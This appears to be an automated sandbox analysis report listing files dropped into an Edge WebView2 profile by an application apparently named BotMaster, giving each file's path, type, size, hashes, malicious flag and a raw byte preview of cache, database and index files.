                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\cff5102b25e87c3c_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):244
                                                                                                                                                                                                                Entropy (8bit):5.418661973653093
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:mGVYk+VvXjWYAGWawhmX4vAH6tVl7HnSTkqHBt:v+hjhykX446ZnSQsBt
                                                                                                                                                                                                                MD5:93B658947C6F69AC7B4467CC43397AD1
                                                                                                                                                                                                                SHA1:5EAAC7A722B5D2078D757E480AA38C1A646DFEF3
                                                                                                                                                                                                                SHA-256:03B27789F2E0BF00559AC59383B32EAE8A131EDF99698838B677A5DC78A9ED09
                                                                                                                                                                                                                SHA-512:FB6F0298DC552C4E9127E8EC47391EDBF87F1214730137B57373A1DCC3D574984A53DB9D388968B21A572780A62424181491D0184897E429E2520D356DD53760
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......h...l.n....._keyhttps://static.whatsapp.net/rsrc.php/v3/yZ/r/yiagt1v2zqJ.js?_nc_x=Ij3Wp8lg5Kz .https://whatsapp.com/.A..Eo..................h.<s.q/.........Z.............a.....i.o...9<6..#t...S.1...%...e10p..A..Eo......6/..$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\fe44f4c0e1d82fea_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):219
                                                                                                                                                                                                                Entropy (8bit):5.296008396348499
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:m+lS1QllLA8RzY5GWWiui5SWEHX27XERWEDAom5ktM9Pt/lSle0zoJ7jIkP5mQpl:mViYYRiui5AHX2b4vAH6tM9l32oJ9P4
                                                                                                                                                                                                                MD5:B1EA9AE580D189E53C22B4CFA4A5BBDC
                                                                                                                                                                                                                SHA1:4BD4C6CA901DE495F9655F0BCAB1E31E4E7F800B
                                                                                                                                                                                                                SHA-256:FC5007B5873C9BB149BBF36CDE9F867FB33A3A70013155E168A46414CDB60B23
                                                                                                                                                                                                                SHA-512:528026D318508D4383FDFA74CA77BC39C0F653BE2D3871C6F0A939A5432F8B66088C337D7D10B5F14362D7BA019423B1CB84B0460F9376FD1056A11094761178
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......O...M..B...._keyhttps://web.whatsapp.com/app.febe97f47327a63e0d22.js .https://whatsapp.com/.A..Eo...................F)r.q/.........Z.........../.a.........aQ.O8....kW..Y.o...k.N..U..U.A..Eo......s..$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\index-dir\temp-index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:VAX COFF executable, sections 0, created Fri Aug 11 02:18:35 1995, not stripped
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):384
                                                                                                                                                                                                                Entropy (8bit):4.857403867964228
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:YA+eF+l8nUE8llgiUKl81+hekFTlO1faE4+j0uXvuODVTtTthnKl8:bXV2miUw2aE+Wpfn1
                                                                                                                                                                                                                MD5:584D2994FC344068F05018DC204DC9CD
                                                                                                                                                                                                                SHA1:8CA85DFC3A237DCE84E54AD56B9640A1C0C857F2
                                                                                                                                                                                                                SHA-256:39FC372DD4A0AD911631549FA7A4A5522501E1160E4C7244A9C394ADC3DFDBB5
                                                                                                                                                                                                                SHA-512:E21770FA44443B4B41DBDEDF26C87D5772E4CC442E7573FE096BDB89BBD61125A8858D7310BC8879887F8FD2FEBFF0917DD632EE3984FEF0F72347FB89548B5A
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Preview:x.....*0oy retne........................<|.%+...@Lhs.q/..........Bd^.6.v..Ys.q/..........F.<.K.@C+s.q/..........b.(..&....s.q/.........S).Q......Ys.q/...........~.a.D...Ys.q/............g.[...|.r.q/............'o.,%...r.q/........../....D....r.q/.........}^..'.1<...s.q/...........a..V....dr.q/..........t.VP...aFr.q/............~zQ.[@.7r.q/...............i..'r.q/.........v7vs.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\index-dir\the-real-index (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:VAX COFF executable, sections 0, created Fri Aug 11 02:18:35 1995, not stripped
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):384
                                                                                                                                                                                                                Entropy (8bit):4.857403867964228
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:YA+eF+l8nUE8llgiUKl81+hekFTlO1faE4+j0uXvuODVTtTthnKl8:bXV2miUw2aE+Wpfn1
                                                                                                                                                                                                                MD5:584D2994FC344068F05018DC204DC9CD
                                                                                                                                                                                                                SHA1:8CA85DFC3A237DCE84E54AD56B9640A1C0C857F2
                                                                                                                                                                                                                SHA-256:39FC372DD4A0AD911631549FA7A4A5522501E1160E4C7244A9C394ADC3DFDBB5
                                                                                                                                                                                                                SHA-512:E21770FA44443B4B41DBDEDF26C87D5772E4CC442E7573FE096BDB89BBD61125A8858D7310BC8879887F8FD2FEBFF0917DD632EE3984FEF0F72347FB89548B5A
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Preview:x.....*0oy retne........................<|.%+...@Lhs.q/..........Bd^.6.v..Ys.q/..........F.<.K.@C+s.q/..........b.(..&....s.q/.........S).Q......Ys.q/...........~.a.D...Ys.q/............g.[...|.r.q/............'o.,%...r.q/........../....D....r.q/.........}^..'.1<...s.q/...........a..V....dr.q/..........t.VP...aFr.q/............~zQ.[@.7r.q/...............i..'r.q/.........v7vs.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\index-dir\the-real-index~RF623b08.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:VAX COFF executable, sections 0, created Fri Aug 11 02:18:35 1995, not stripped
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):384
                                                                                                                                                                                                                Entropy (8bit):4.857403867964228
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:YA+eF+l8nUE8llgiUKl81+hekFTlO1faE4+j0uXvuODVTtTthnKl8:bXV2miUw2aE+Wpfn1
                                                                                                                                                                                                                MD5:584D2994FC344068F05018DC204DC9CD
                                                                                                                                                                                                                SHA1:8CA85DFC3A237DCE84E54AD56B9640A1C0C857F2
                                                                                                                                                                                                                SHA-256:39FC372DD4A0AD911631549FA7A4A5522501E1160E4C7244A9C394ADC3DFDBB5
                                                                                                                                                                                                                SHA-512:E21770FA44443B4B41DBDEDF26C87D5772E4CC442E7573FE096BDB89BBD61125A8858D7310BC8879887F8FD2FEBFF0917DD632EE3984FEF0F72347FB89548B5A
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Preview:x.....*0oy retne........................<|.%+...@Lhs.q/..........Bd^.6.v..Ys.q/..........F.<.K.@C+s.q/..........b.(..&....s.q/.........S).Q......Ys.q/...........~.a.D...Ys.q/............g.[...|.r.q/............'o.,%...r.q/........../....D....r.q/.........}^..'.1<...s.q/...........a..V....dr.q/..........t.VP...aFr.q/............~zQ.[@.7r.q/...............i..'r.q/.........v7vs.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\wasm\index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\wasm\index-dir\temp-index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):48
                                                                                                                                                                                                                Entropy (8bit):2.9555576533947305
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:z+ZnEG9UKl:SZEkU+
                                                                                                                                                                                                                MD5:118C0F6E0C37950389A92D8124F938BF
                                                                                                                                                                                                                SHA1:7E8CC26103010948363AC5E5FC37F938E7D06ADE
                                                                                                                                                                                                                SHA-256:0674B0D92811288DEBC67E21A27EE7380A551BB05B559A71EF10E6E74DBE789F
                                                                                                                                                                                                                SHA-512:49795D33DE833444C2C008B21DB9955267A2E4DA4A1E93119CCBBCE3AC0C1B32B9BA289DC72D4F5DEFF2353463A1405B7F750556B6CCB30350CD4291A0F51386
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:(.......oy retne........................Z.q.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\wasm\index-dir\the-real-index (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):48
                                                                                                                                                                                                                Entropy (8bit):2.9555576533947305
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:z+ZnEG9UKl:SZEkU+
                                                                                                                                                                                                                MD5:118C0F6E0C37950389A92D8124F938BF
                                                                                                                                                                                                                SHA1:7E8CC26103010948363AC5E5FC37F938E7D06ADE
                                                                                                                                                                                                                SHA-256:0674B0D92811288DEBC67E21A27EE7380A551BB05B559A71EF10E6E74DBE789F
                                                                                                                                                                                                                SHA-512:49795D33DE833444C2C008B21DB9955267A2E4DA4A1E93119CCBBCE3AC0C1B32B9BA289DC72D4F5DEFF2353463A1405B7F750556B6CCB30350CD4291A0F51386
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:(.......oy retne........................Z.q.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\DIPS

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                Entropy (8bit):0.4656606200131176
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBWlw/f:TouQq3qh7z3bY2LNW9WMcUvBiw
                                                                                                                                                                                                                MD5:60397597CC29838FEE8384AF6AEB55A5
                                                                                                                                                                                                                SHA1:076BBAE04413C10FEA93135DDD5109C6737FDF72
                                                                                                                                                                                                                SHA-256:6C340F71E35A22BECC66D42A493CC90FE2AB934A2B90C6B8844B9C7708CF1668
                                                                                                                                                                                                                SHA-512:0AB80737E985DAF6E9096FDCB52DAA029DA600D858A7611924A871706C2E80BC4E4C300E0D9BF5255B8E735A83B9E2AC81A89A45A734AF2A7642CBFC5C7B7F09
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\DawnCache\data_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\DawnCache\data_1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\DawnCache\data_2

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\DawnCache\data_3

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\DawnCache\index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:LsNlLyUCU+l:Ls3DCp
                                                                                                                                                                                                                MD5:ADD8B7FFD49B697FE4CBC05D188BD1D8
                                                                                                                                                                                                                SHA1:A1FA526EA3EFE0FB3A1FA529F4B357D8E9FD7E6D
                                                                                                                                                                                                                SHA-256:015AB74B15003EE77CA8B1CDA231A1F72F835208B9478800B84DDE6963EFEE38
                                                                                                                                                                                                                SHA-512:8FF76523B1EE98CB063DAC44AAE43B8B0040F0B2B0D39FE70224937E5D15850163DB31AF70676C32A16DA546C9BDA0DE5E644835E167D6CF37D996FA46B6819D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.........................................).q.q/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\EdgeEDrop\EdgeEDropSQLite.db

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                Entropy (8bit):0.494709561094235
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                                                                                MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                                                                                SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                                                                                SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                                                                                SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Rules\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Rules\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):38
                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:FQxlXNQxlX:qTCT
                                                                                                                                                                                                                MD5:51A2CBB807F5085530DEC18E45CB8569
                                                                                                                                                                                                                SHA1:7AD88CD3DE5844C7FC269C4500228A630016AB5B
                                                                                                                                                                                                                SHA-256:1C43A1BDA1E458863C46DFAE7FB43BFB3E27802169F37320399B1DD799A819AC
                                                                                                                                                                                                                SHA-512:B643A8FA75EDA90C89AB98F79D4D022BB81F1F62F50ED4E5440F487F22D1163671EC3AE73C4742C11830214173FF2935C785018318F4A4CAD413AE4EEEF985DF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.f.5................f.5...............

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Rules\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Rules\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):307
                                                                                                                                                                                                                Entropy (8bit):5.23502433382558
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:FQVUfhq1wknaZ5KrWLYQV+dpaVdg2KLlvQVUNq2PwknaZ5KrWLYQV+dpaPrqIFUv:S+Z1rHUdHL6+NvYrHUdo3FUv
                                                                                                                                                                                                                MD5:F21015FAC0C7D628E65605A4EA901BF8
                                                                                                                                                                                                                SHA1:7FEB4971C1EE6405C439B2AFD3B46012003BF799
                                                                                                                                                                                                                SHA-256:C968036798179266E8493669392AC59A61C1AE00332B5D742692CF2AE4DFEC4A
                                                                                                                                                                                                                SHA-512:CEEF05AFC1F0CF951BDE82F1189662F2425B3135880068F9B198444315939E36F1FF32F8AF4EBF6ED7479258AA78A612AAEF5DA329DDA9A8FA12D5CF689DAF17
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:01.323 1d60 Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Rules since it was missing..2024/03/10-17:46:01.385 1d60 Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Rules/MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Rules\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Extension Scripts\000001.dbtmp

                                                                                                                                                                                                                Download File
